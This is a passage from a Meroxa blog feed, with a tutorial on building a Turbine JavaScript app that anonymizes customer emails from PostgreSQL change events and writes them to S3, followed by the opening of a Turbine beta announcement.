    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; anonymized &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;anonymize&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;anonymized&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_order&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This application uses&lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/setup&quot;&gt;JavaScript&lt;/a&gt;, but Turbine also has&lt;a href=&quot;https://docs.meroxa.com/turbine/python/setup&quot;&gt;Python&lt;/a&gt;,&lt;a href=&quot;https://docs.meroxa.com/turbine/go/setup&quot;&gt;Go&lt;/a&gt; and&lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;Ruby&lt;/a&gt; libraries.&lt;/p&gt;
&lt;p&gt;Here is a quick overview of the steps we will take to get started:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How it works?&lt;/li&gt;
&lt;li&gt;Setup&lt;/li&gt;
&lt;li&gt;Application Entrypoint&lt;/li&gt;
&lt;li&gt;Running&lt;/li&gt;
&lt;li&gt;Deployment&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;How it works?&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#how-it-works&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;A data application responds to events from your data infrastructure. You can learn more about the anatomy of a Javascript data application in the&lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript#the-application&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/real-time-data-lake-14939c0cfacbc879f91e2db134877966.png&quot; alt=&quot;Application Diagram&quot;&gt;&lt;/p&gt;
&lt;p&gt;This data application will:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Listen to&lt;a href=&quot;https://medium.com/meroxa/stream-your-database-changes-with-change-data-capture-aa8797fa9070&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;CREATE&lt;/code&gt;,&lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt;, and&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt;&lt;/a&gt; events from a PostgreSQL database.&lt;/li&gt;
&lt;li&gt;Anonymize the data using a custom function.&lt;/li&gt;
&lt;li&gt;Write the anonymized data to an S3 bucket.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Setup&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#setup&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Before we begin, you need to setup a few things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Sign up for a Meroxa account and install the latest Meroxa CLI.&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa login&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js-examples&quot;&gt;Clone the example to your local machine&lt;/a&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; clone git@github.com:meroxa/turbine-js-examples.git&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Since this example uses Javascript, you will need to have&lt;a href=&quot;https://nodejs.org/&quot;&gt;Node.js&lt;/a&gt; installed.&lt;/p&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Copy the&lt;code class=&quot;language-text&quot;&gt;real-time-data-lake&lt;/code&gt; directory to your local machine:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;cp&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; ~/turbine-js-examples/real-time-data-lake-ingestion ~/&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;5&quot;&gt;
&lt;li&gt;Install NPM dependencies:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; real-time-data-lake-ingestion&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;npm&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we are ready to build.&lt;/p&gt;
&lt;h3&gt;Application Entrypoint&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#application-entrypoint&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Within&lt;code class=&quot;language-text&quot;&gt;index.js&lt;/code&gt; you will find the main entrypoint to our data application:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; stringHash &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string-hash&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;iAmHelping&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;~~~&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;str&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;~~~&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;isAttributePresent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;typeof&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;attr&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;undefined&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; attr &lt;span class=&quot;token operator&quot;&gt;!==&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token function&quot;&gt;anonymize&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; payload &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;isAttributePresent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;isAttributePresent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;customer_email&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;customer_email &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;iAmHelping&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
          &lt;span class=&quot;token function&quot;&gt;stringHash&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;customer_email&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;toString&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_order&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; anonymized &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;anonymize&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;anonymized&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_order&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here is what the code does:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;export.App&lt;/code&gt; - This is the entrypoint for your data application. It is responsible for identifying the upstream datastore, the upstream records, and the code to execute against the upstream records. This is the data pipline logic (move data from here to there).&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;anonymize&lt;/code&gt; is the method defined for our&lt;code class=&quot;language-text&quot;&gt;App&lt;/code&gt; that will be called to process the data. It takes a single parameter,&lt;code class=&quot;language-text&quot;&gt;records&lt;/code&gt;. This is an array of records. This function will return a new array of records with the anonymized data.&lt;/p&gt;
&lt;h3&gt;Running&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#running&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Next, you may run your data application locally:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app run&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Turbine will uses&lt;a href=&quot;https://docs.meroxa.com/getting-started/quickstart#run-a-streaming-app-locally&quot;&gt;fixtures to simulate your data&lt;/a&gt; infrastructure locally. This allows you to test without having to worry about the infrastructure. Fixtures are JSON-formatted data records you can develop against locally. To customize the fixtures for your application, you can find them in the&lt;code class=&quot;language-text&quot;&gt;fixtures&lt;/code&gt; directory.&lt;/p&gt;
&lt;h3&gt;Deployment&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#deployment&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;After you test the behavior locally, you can deploy it to Meroxa.&lt;/p&gt;
&lt;p&gt;Meroxa is the data platform to run and execute your Turbine apps. Meroxa takes care of maintaining the connection to your database and executing your application as changes. All you need to worry about is the data application itself.&lt;/p&gt;
&lt;p&gt;Here is how you deploy:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Add a PostgreSQL resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; postgres://&lt;span class=&quot;token variable&quot;&gt;$PG_USER&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PASS&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$PG_URL&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PORT&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$PG_DB&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;Add a Amazon S3 resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create datalake &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; s3 &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token output&quot;&gt;&quot;s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET\&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Deploy to Meroxa:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That&apos;s it! Your data application is now running. You can now verify the data in your Amazon S3 bucket.&lt;/p&gt;
&lt;p&gt;We can&apos;t wait to see what you build 🚀.&lt;/p&gt;
&lt;p&gt;If you have any questions or feedback:&lt;a href=&quot;https://discord.com/invite/pN24QPca6b/&quot;&gt;Join the Community&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Turbine: Putting the “App” in Data App]]></title><description><![CDATA[We’re excited to share the next chapter of Meroxa and what it means for software engineers to build, test and deploy data applications.]]></description><link>https://meroxa.com/blog/turbine-putting-the-app-in-data-app</link><guid isPermaLink="false">https://meroxa.com/blog/turbine-putting-the-app-in-data-app</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Wed, 20 Apr 2022 16:12:00 GMT</pubDate><content:encoded>&lt;p&gt;We’re excited to share the next chapter of Meroxa and what it means for software engineers to build, test and deploy data applications. Building data-driven applications in today’s world is incredibly complex. Most of the underlying infrastructure and tooling that helps make real-time and event-driven applications possible requires that developers build all sorts of plumbing before they can deliver real to their customers. Being able to follow standard DevOps practices that developers have come to expect when building web apps is almost non-existent in the current data app world.&lt;/p&gt;
&lt;p&gt;Today, Meroxa is pleased to introduce a public beta of Turbine. Turbine is a code-first data application framework that engineers can use to build features that respond to and run code against data changes and events, in real-time. The best part about Turbine is that it fits within your current development workflows (e.g. Build, Test, &amp;#x26; Deploy) to the point where building a data app will feel a lot like writing a web app. When coupled with the Meroxa platform, Turbine data apps are easily deployed and scaled to meet the velocity of the data changes happening upstream.&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
&lt;p&gt;Building data apps start with the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt; on your operating system of choice (Windows, Mac, &amp;#x26; Linux). Once you’ve got the CLI installed, creating the initial data app is a simple command:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;$ meroxa apps init customer_360 –lang js&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;You’ll get a new directory called `customer_360` on your machine with all of the scaffolding needed to start building the app in JavaScript. The app has a small set of conventions that you need to follow. The best part about this approach is that we didn’t create any bespoke DSLs or some YAML to drive the application and the infrastructure. If &lt;a href=&quot;https://github.com/meroxa/turbine-js&quot;&gt;JavaScript&lt;/a&gt; isn’t your thing, you can write Turbine apps in &lt;a href=&quot;https://github.com/meroxa/turbine-go&quot;&gt;Go&lt;/a&gt;, and &lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;Python&lt;/a&gt;!&lt;/p&gt;
&lt;h3&gt;Enrich Customer Data As it Comes In&lt;/h3&gt;
&lt;p&gt;Being able to respond to customers immediately is critical to engagement. At Meroxa, anytime someone creates an account, we take that data and enrich it using the Clearbit API before storing it back in our production database. We’ve taken a simplified version of our code to demonstrate how we do it. You’ll see a simple Turbine app that listens to a production PostgreSQL database (`demo_pg`) for changes, runs custom code via the `Process` function, and writes that data back to PostgreSQL.&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/1_Hv3IDjt1x2kQfIjUW8CuXw.png&quot; alt=&quot;1_Hv3IDjt1x2kQfIjUW8CuXw&quot;&gt;Full enrich&lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/go/enrich&quot;&gt;example code on GitHub&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This is the core of the entire Turbine application. While this example is in Go, the same could be written in&lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/javascript&quot;&gt;JavaScript&lt;/a&gt;or&lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/python&quot;&gt;Python&lt;/a&gt;.&lt;/p&gt;
